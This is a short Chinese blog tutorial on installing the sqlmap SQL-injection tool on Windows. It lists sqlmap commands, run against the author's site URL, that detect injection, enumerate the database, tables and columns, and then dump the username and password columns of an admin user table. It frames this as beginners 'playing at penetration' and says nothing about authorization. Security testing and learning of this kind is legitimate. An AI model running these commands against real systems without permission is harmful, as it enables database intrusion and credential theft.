本文介绍如何在Windows环境下利用sqlmap这款Python编写的自动化SQL注入工具进行渗透测试。首先,讲解了sqlmap的安装步骤,包括Python环境的配置和sqlmap的解压与放置。接着,列举了一些常用的sqlmap命令,如检测注入、获取当前用户、数据库、表和字段,并演示了数据的导出过程。
老威SEO前段时间研究了一下sqlmap,其作为一款自动化的sql注入渗透工具,注入方式、注入成功后的取数据等等都是自动化的,非常适合我们这些小白前期玩玩渗透玩玩安全,它是用python写的,因此需要先安装python环境,一般都是傻瓜式安装操作
一、sqlmap的安装
1.python下载地址:
2.sqlmap下载地址:
把下载的sqlmap压缩包解压到文件夹sqlmap中,并将其复制粘贴到 “C:\Python27” 目录下(注:Python27为python安装文件夹)
在桌面新建一个cmd的快捷方式,将其命名为“SQLMap”,并键入对象位置为:cmd,快捷方式名称:SQLMap
双击刚才创建的快捷方式,输入sqlmap.py -h,出现如下信息则表示安装成功。
二、sqlmap的常用命令
sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" 检测注入
sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-user 获取当前用户 laowei@localhost
sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-db 获取当前数据库 如为db_inis
sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --tables -D db_inis
sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables 获取当前数据库下所有表 如表为3
sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user 获取表3下的所有字段 如字段为4,5,6
sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump 注入完成
最后:此文章还待更新中……请持续关注
扫一扫
1049
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
